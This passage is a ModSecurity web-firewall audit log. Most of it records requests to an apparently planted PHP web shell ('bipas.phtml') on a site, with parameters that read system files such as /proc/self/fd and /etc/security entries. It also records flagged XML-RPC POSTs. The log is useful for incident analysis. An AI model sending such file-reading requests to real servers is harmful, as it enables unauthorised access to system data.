--511d2508-H-- Message: Warning. Matched phrase "etc/security/namespace.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/namespace.conf found within ARGS:viewfile: /snap/core20/2582/etc/security/namespace.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/security/namespace.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/namespace.conf found within ARGS:viewfile: /snap/core20/2582/etc/security/namespace.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBuApVkCcfT-Z8NQYyYHAAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1750101506946217 4696 (- - -) Stopwatch2: 1750101506946217 4696; combined=2416, p1=367, p2=1906, p3=34, p4=46, p5=63, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --511d2508-Z-- --5d8e1768-A-- [17/Jun/2025:00:48:36.510221 +0530] aFBuDI3q6eGJ2xNcTd6KSgAAAAU 216.73.216.71 54468 127.0.0.1 7081 --5d8e1768-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Fsecurity%2Flimits.d HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --5d8e1768-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2827 Connection: close Content-Type: text/html; charset=UTF-8 --5d8e1768-H-- Message: Warning. Matched phrase "etc/security/limits" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/limits found within ARGS:path: /snap/core20/2582/etc/security/limits.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/security/limits" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/limits found within ARGS:path: /snap/core20/2582/etc/security/limits.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBuDI3q6eGJ2xNcTd6KSgAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1750101516506165 4130 (- - -) Stopwatch2: 1750101516506165 4130; combined=2273, p1=382, p2=1749, p3=38, p4=30, p5=74, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5d8e1768-Z-- --e3c1f170-A-- [17/Jun/2025:00:48:39.786906 +0530] aFBuD-2BajTuKRK3FvJ-SwAAAAE 216.73.216.71 48260 127.0.0.1 7081 --e3c1f170-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fsecurity%2Flimits.d HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --e3c1f170-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2820 Connection: close Content-Type: text/html; charset=UTF-8 --e3c1f170-H-- Message: Warning. Matched phrase "etc/security/limits" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/limits found within ARGS:path: /proc/self/root/etc/security/limits.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/security/limits" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/limits found within ARGS:path: /proc/self/root/etc/security/limits.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBuD-2BajTuKRK3FvJ-SwAAAAE"] Apache-Handler: application/x-httpd-php Stopwatch: 1750101519783019 3942 (- - -) Stopwatch2: 1750101519783019 3942; combined=2069, p1=352, p2=1588, p3=36, p4=30, p5=63, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e3c1f170-Z-- --52133700-A-- [17/Jun/2025:00:49:04.200766 +0530] aFBuJ5VkCcfT-Z8NQYyYTAAAAAc 34.68.37.79 49606 127.0.0.1 7081 --52133700-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 488 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --52133700-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --52133700-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (77+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (77+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFBuJ5VkCcfT-Z8NQYyYTAAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750101543494652 706170 (- - -) Stopwatch2: 1750101543494652 706170; combined=2631, p1=379, p2=1859, p3=38, p4=80, p5=172, sr=108, sw=103, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --52133700-Z-- --86fc2965-A-- [17/Jun/2025:00:49:15.510054 +0530] aFBuM33hoSwVUy254pH31QAAACQ 216.73.216.71 36716 127.0.0.1 7081 --86fc2965-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2599%2Fetc%2Fsecurity&viewfile=%2F%2Fsnap%2Fcore20%2F2599%2Fetc%2Fsecurity%2Fnamespace.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --86fc2965-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3610 Connection: close Content-Type: text/html; charset=UTF-8 --86fc2965-H-- Message: Warning. Matched phrase "etc/security/namespace.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/namespace.conf found within ARGS:viewfile: /snap/core20/2599/etc/security/namespace.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/security/namespace.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/namespace.conf found within ARGS:viewfile: /snap/core20/2599/etc/security/namespace.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBuM33hoSwVUy254pH31QAAACQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1750101555505568 4544 (- - -) Stopwatch2: 1750101555505568 4544; combined=2531, p1=377, p2=2024, p3=36, p4=38, p5=56, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --86fc2965-Z-- --477c5742-A-- [17/Jun/2025:00:49:18.150914 +0530] aFBuNn3hoSwVUy254pH32QAAACQ 216.73.216.71 37052 127.0.0.1 7081 --477c5742-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2599%2Fetc%2Fsecurity%2Flimits.d HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --477c5742-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2827 Connection: close Content-Type: text/html; charset=UTF-8 --477c5742-H-- Message: Warning. Matched phrase "etc/security/limits" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/limits found within ARGS:path: /snap/core20/2599/etc/security/limits.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/security/limits" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/limits found within ARGS:path: /snap/core20/2599/etc/security/limits.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBuNn3hoSwVUy254pH32QAAACQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1750101558146817 4151 (- - -) Stopwatch2: 1750101558146817 4151; combined=2310, p1=420, p2=1764, p3=38, p4=30, p5=58, sr=132, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --477c5742-Z-- --efb00338-A-- [17/Jun/2025:00:50:03.913108 +0530] aFBuYxwcFb_n1P0IC9xpHAAAAAo 34.68.37.79 49488 127.0.0.1 7081 --efb00338-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --efb00338-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --efb00338-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (77+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (77+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFBuYxwcFb_n1P0IC9xpHAAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750101603089183 823982 (- - -) Stopwatch2: 1750101603089183 823982; combined=2441, p1=372, p2=1694, p3=41, p4=61, p5=170, sr=102, sw=103, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --efb00338-Z-- --2595040a-A-- [17/Jun/2025:00:50:40.518456 +0530] aFBuiH3hoSwVUy254pH4KgAAACQ 3.215.221.125 41158 127.0.0.1 7081 --2595040a-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/19 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 3.215.221.125 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --2595040a-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2952 Connection: close Content-Type: text/html; charset=UTF-8 --2595040a-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/19"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/19"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBuiH3hoSwVUy254pH4KgAAACQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1750101640514480 4202 (- - -) Stopwatch2: 1750101640514480 4202; combined=2061, p1=342, p2=1605, p3=37, p4=24, p5=53, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2595040a-Z-- --b4c3e20b-A-- [17/Jun/2025:00:51:04.314868 +0530] aFBun5lL5_2Zd8wUdfLM7QAAAAg 34.68.37.79 46408 127.0.0.1 7081 --b4c3e20b-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --b4c3e20b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --b4c3e20b-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (78+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (78+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFBun5lL5_2Zd8wUdfLM7QAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750101663607216 707719 (- - -) Stopwatch2: 1750101663607216 707719; combined=2534, p1=447, p2=1614, p3=52, p4=78, p5=210, sr=143, sw=133, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b4c3e20b-Z-- --18a1e932-A-- [17/Jun/2025:00:52:03.778692 +0530] aFBu203CmevS3xeTzmonYgAAAAQ 34.68.37.79 36006 127.0.0.1 7081 --18a1e932-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 489 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --18a1e932-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --18a1e932-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (77+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (77+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFBu203CmevS3xeTzmonYgAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750101723076989 701766 (- - -) Stopwatch2: 1750101723076989 701766; combined=2505, p1=380, p2=1767, p3=43, p4=50, p5=167, sr=111, sw=98, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --18a1e932-Z-- --ee54dd7d-A-- [17/Jun/2025:00:53:04.216939 +0530] aFBvF5lL5_2Zd8wUdfLNVAAAAAg 34.68.37.79 58474 127.0.0.1 7081 --ee54dd7d-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 487 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --ee54dd7d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --ee54dd7d-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (79+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (79+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFBvF5lL5_2Zd8wUdfLNVAAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750101783440377 776620 (- - -) Stopwatch2: 1750101783440377 776620; combined=2240, p1=365, p2=1504, p3=43, p4=66, p5=167, sr=105, sw=95, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ee54dd7d-Z-- --8246c53d-A-- [17/Jun/2025:00:54:04.033542 +0530] aFBvU5lL5_2Zd8wUdfLNmwAAAAg 34.68.37.79 54530 127.0.0.1 7081 --8246c53d-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 489 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --8246c53d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --8246c53d-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (79+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (79+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFBvU5lL5_2Zd8wUdfLNmwAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750101843303794 729832 (- - -) Stopwatch2: 1750101843303794 729832; combined=2248, p1=402, p2=1427, p3=48, p4=66, p5=188, sr=117, sw=117, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8246c53d-Z-- --da1af07f-A-- [17/Jun/2025:00:55:04.430471 +0530] aFBvj1JfblPUQiSn5r1mgQAAAAA 34.68.37.79 56812 127.0.0.1 7081 --da1af07f-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 488 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --da1af07f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --da1af07f-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (79+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (79+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFBvj1JfblPUQiSn5r1mgQAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750101903655139 775389 (- - -) Stopwatch2: 1750101903655139 775389; combined=2346, p1=366, p2=1626, p3=43, p4=57, p5=161, sr=95, sw=93, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --da1af07f-Z-- --db1d901b-A-- [17/Jun/2025:00:56:03.713831 +0530] aFBvy1JfblPUQiSn5r1msgAAAAA 34.68.37.79 50254 127.0.0.1 7081 --db1d901b-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --db1d901b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --db1d901b-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (78+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (78+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFBvy1JfblPUQiSn5r1msgAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750101963005040 708872 (- - -) Stopwatch2: 1750101963005040 708872; combined=2367, p1=459, p2=1432, p3=58, p4=73, p5=219, sr=146, sw=126, l=0, gc=0 Producer: ModSecurity for 